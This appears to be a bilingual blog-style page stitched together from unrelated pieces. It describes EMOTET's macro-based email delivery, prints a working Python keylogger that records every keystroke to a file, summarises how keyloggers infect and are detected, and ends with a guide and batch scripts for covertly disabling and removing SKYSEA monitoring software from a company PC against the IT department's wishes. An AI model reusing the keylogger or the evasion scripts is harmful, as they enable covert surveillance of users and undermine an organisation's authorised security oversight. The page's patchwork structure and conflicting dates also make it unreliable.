Spread via Word documents

通过 Word 文档传播

The EMOTET group managed to take email as an attack vector to a next level. Through a fully automated process, EMOTET malware was delivered to the victims’ computers via infected e-mail attachments. A variety of different lures were used to trick unsuspecting users into opening these malicious attachments. In the past, EMOTET email campaigns have also been presented as invoices, shipping notices and information about COVID-19.

All these emails contained malicious Word documents, either attached to the email itself or downloadable by clicking on a link within the email itself. Once a user opened one of these documents, they could be prompted to “enable macros” so that the malicious code hidden in the Word file could run and install EMOTET malware on a victim’s computer.

EMOTET 群体成功将电子邮件作为攻击向量提升到了一个新水平。通过完全自动化的过程,EMOTET 恶意软件通过感染的电子邮件附件传递到受害者的计算机上。各种不同的诱饵被用来欺骗毫无戒备的用户打开这些恶意附件。过去,EMOTET 的电子邮件活动也曾被伪装成发票、运输通知和有关 COVID-19 的信息。

所有这些电子邮件都包含恶意的 Word 文档,文档要么附在电子邮件中,要么通过点击邮件中的链接下载。一旦用户打开了这些文档,他们可能会被提示『启用宏』,以便隐藏在 Word 文件中的恶意代码可以运行,并在受害者的计算机上安装 EMOTET 恶意软件。

Attacks for hire

雇佣攻击

EMOTET was much more than just a malware. What made EMOTET so dangerous is that the malware was offered for hire to other cybercriminals to install other types of malware, such as banking Trojans or ransomwares, onto a victim’s computer.

This type of attack is called a ‘loader’ operation, and EMOTET is said to be one of the biggest players in the cybercrime world as other malware operators like TrickBot and Ryuk have benefited from it.

Its unique way of infecting networks by spreading the threat laterally after gaining access to just a few devices in the network made it one of the most resilient malware in the wild.

EMOTET 不仅仅是一种恶意软件。EMOTET 之所以危险,是因为它被提供给其他网络犯罪分子,用于在受害者的计算机上安装其他类型的恶意软件,如银行木马或勒索软件。

这种类型的攻击被称为『加载程序』操作,EMOTET 被认为是网络犯罪世界中的最大玩家之一,因为其他恶意软件操作员如 TrickBot 和 Ryuk 从中受益。

它通过在网络中获得访问权限后横向传播威胁的独特方式,使其成为最具弹性的恶意软件之一。

Emotet Malware

Emotet 恶意软件

网络钓鱼:带有恶意链接的鱼叉式钓鱼

Keylogger

键盘记录器

python -m pip install pynput
In [1]:
from pynput import keyboard
In [2]:
log_file = 'keylog.txt'

def on_press(key: keyboard.Key | keyboard.KeyCode | None) -> None:
    with open(log_file, 'a') as f:
        f.write(f'[{key}]')

with keyboard.Listener(on_press=on_press) as listener:
    listener.join()

How to detect keyloggers?

Detecting keylogger programs on a computer usually involves fairly obvious warning signs: the browser slows down, there are delays when moving the mouse or typing, or the cursor disappears. Even if you use the best privacy browsers, keyloggers can still track your inputs.


How keyloggers infect your device?

Hackers often use social engineering methods to infect victims with keyloggers. A keylogger can infect your device in different ways, sometimes depending on your device type. And even though a spyware removal tool can handle keystroke logger detection, you want to avoid this dangerous type of malware to begin with.

Here’s the general process for how a keylogger infects your device:

  1. A cybercriminal sends an infected phishing message, usually through an email attachment, SMS message, or infected website.

  2. When you click the link for the infected website or attachment, the keylogger automatically downloads itself onto your device.

  3. The keystroke tracker immediately starts to collect your keystrokes, most likely without being detected until you run a keylogger scan.

如何检测键盘记录器?

检测计算机上键盘记录器程序的警告信号通常相当明显:浏览器变慢、鼠标移动或键击时出现延迟,或者光标消失。即使你使用最好的隐私浏览器,键盘记录器也能跟踪你的输入。


键盘记录器如何感染你的设备?

黑客通常使用社会工程学方法来感染受害者的设备。键盘记录器可以通过多种方式感染你的设备,这些方式有时取决于你的设备类型。虽然间谍软件清除工具可以处理键盘记录器的检测,但最好的办法是从一开始就避免这种危险的恶意软件。

以下是键盘记录器感染你设备的一般过程:

  1. 网络犯罪分子发送带有感染的钓鱼信息,通常通过电子邮件附件、短信或感染的网站进行发送。

  2. 当你点击感染网站的链接或附件时,键盘记录器会自动下载到你的设备上。

  3. 键盘记录器立即开始收集你的按键输入,通常在你运行键盘记录器扫描之前不会被发现。

SKYSEA 这个间谍软件的删除方法

一、详细操作指南

社内PC上未经允许安装并获取操作日志的麻烦间谍软件。让我们根除这个间谍软件,提高生活质量(QOL)。

  1. 使用 RegistryFinder 删除注册表中所有包含 “skysea” 的项。也可以使用 regedit,但比较麻烦。

    删除注册表中 Key 列和 Value 列中包含 “SKYSEA” 的记录(右键点击 → 从注册表中删除)。

  2. 通过资源管理器右键点击 PC → 管理 → 左侧树状图中的 服务和应用程序 → 服务中的 “Swd” 右键点击 → 属性 → 将服务状态设置为停止,将启动类型设置为禁用。

    删除 C:\WINDOWS 目录中的 “wds” 文件夹。

  3. 通过资源管理器右键点击 PC → 管理 → 左侧树状图中的 服务和应用程序 → 服务中的 “awssm” 右键点击 → 属性 → 将服务状态设置为停止,将启动类型设置为禁用。

    删除 C:\WINDOWS 目录中的 “awssm” 文件夹。

  4. 将以下文本保存为 .bat 文件并运行。也可以手动停止和禁用服务。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    @echo off

    rem 禁用服务
    sc config "Swd" start= disabled
    sc config "awssm" start= disabled
    sc config "SCVCabProxySvr" start= disabled
    sc config "CompactSvc" start= disabled
    sc config "ScvUpdSvc" start= disabled
    sc config "AstExAgt" start= disabled
    sc config "ScvSvc" start= disabled
    sc config "SCV LogAgentService" start= disabled
    sc config "LogSvr" start= disabled
    sc config "IceSvc" start= disabled

    rem 停止服务
    net stop "Swd"
    net stop "awssm"
    net stop "SCVCabProxySvr"
    net stop "CompactSvc"
    net stop "ScvUpdSvc"
    net stop "AstExAgt"
    net stop "ScvSvc"
    net stop "SCV LogAgentService"
    net stop "LogSvr"
    net stop "IceSvc"

    因为各服务会进行活性监控,需要多次运行 bat 文件来完全停止它们。如果不行的话可以手动从服务界面停止。

  5. 打开任务管理器,右键点击 “SKYSEA Client View Version 16.1” → 结束任务。然后删除 C:\Program Files (x86) 目录中的 “Sky Product” 文件夹。如果无法删除,可能是服务未完全停止或者任务管理器中还有 “SKYSEA Client View Version 16.1”。

  6. 重启电脑,如果任务管理器中没有任何与 “SKYSEA” 相关的进程,说明删除成功。

结束监视社会。感谢这家公司,我连藤原竜也都讨厌了。

2023年10月15日更新

在多次停止服务后,系统部门又说『日志无法获取了』,我反复说『请远程安装』,然后删除了日志。但随着新版本的发布,他们要求重新安装。我本来不想安装,但最后不得不安装。安装后,他们又说『日志无法获取』,但我不在乎。

后来我再次尝试删除这个恶心的间谍软件,但 “C:\Program Files (x86)\Sky Product\SKYSEA Client View” 文件夹被占用,无法删除。因为不想查找具体是哪项服务占用,于是按照以下步骤进行处理:

  1. 右键点击 Windows 标志,选择 “运行”。
  2. 输入 “resmon.exe” 并点击 “确定”。
  3. 在资源监视器中,打开 “CPU” 选项卡。
  4. 展开 “关联的句柄” 部分。
  5. 在 “关联的句柄” 搜索框中输入 “SKYSEA Client View”。
  6. 等待搜索结果显示。
  7. 右键点击显示的进程,选择 “结束进程”。

即便是 Chrome 和 Outlook 也受到影响,这太恶心了。想到系统部门的老男人可能会窥探女性员工的搜索历史,真是太可怕了。

无法删除文件夹时,可以参考以下 URL,通过移除 administrators 权限并授予 everyone 完全控制权限来删除文件夹:

二、服务停止与启动脚本

昨天写的删除方法,其实不用删除注册表也可以停止服务。但是,如果想彻底清理,建议删除注册表项目。

因为有些公司可能会在删除后抱怨,所以我创建了停止和启动服务的 bat 文件。请在自担风险下使用。

服务停止.bat

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
@echo off

rem 禁用服务并停止,移动模块
sc config "Swd" start= disabled
net stop "Swd"
move C:\Windows\wds C:\kasu\wds

sc config "awssm" start= disabled
net stop "awssm"
move C:\WINDOWS\avv5sm C:\kasu\avv5sm

rem 终止进程
taskkill /F /im CtlCli64.exe
taskkill /F /im LogChromeNativeHost.exe
taskkill /F /im AstAgent.exe
taskkill /F /im CtlCli.exe
taskkill /F /im SvcMon.exe
taskkill /F /im SKYSEAHS.exe

rem 禁用其他服务
sc config "SCVCabProxySvr" start= disabled
sc config "CompactSvc" start= disabled
sc config "ScvUpdSvc" start= disabled
sc config "AstExAgt" start= disabled
sc config "ScvSvc" start= disabled
sc config "SCV LogAgentService" start= disabled
sc config "LogSvr" start= disabled
sc config "IceSvc" start= disabled

rem 停止其他服务
net stop "SCVCabProxySvr"
net stop "CompactSvc"
net stop "ScvUpdSvc"
net stop "AstExAgt"
net stop "ScvSvc"
net stop "SCV LogAgentService"
net stop "LogSvr"
net stop "IceSvc"

rem 移动 C:\Program Files (x86)\Sky Product 文件夹
move "C:\Program Files (x86)\Sky Product" "C:\kasu"

服务启动.bat

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
@echo off

rem 启用服务并启动,移动模块
sc config "Swd" start= auto
net start "Swd"
move C:\kasu\wds C:\Windows\wds

sc config "awssm" start= auto
net start "awssm"
move C:\kasu\avv5sm C:\WINDOWS\avv5sm

rem 启用其他服务
sc config "SCVCabProxySvr" start= auto
sc config "CompactSvc" start= auto
sc config "ScvUpdSvc" start= auto
sc config "AstExAgt" start= auto
sc config "ScvSvc" start= auto
sc config "SCV LogAgentService" start= auto
sc config "LogSvr" start= auto
sc config "IceSvc" start= auto

rem 启动其他服务
net start "SCVCabProxySvr"
net start "CompactSvc"
net start "ScvUpdSvc"
net start "AstExAgt"
net start "ScvSvc"
net start "SCV LogAgentService"
net start "LogSvr"
net start "IceSvc"

rem 移动 C:\Program Files (x86)\Sky Product 文件夹回原位置
move "C:\kasu\Sky Product" "C:\Program Files (x86)"

Comments

2021-11-12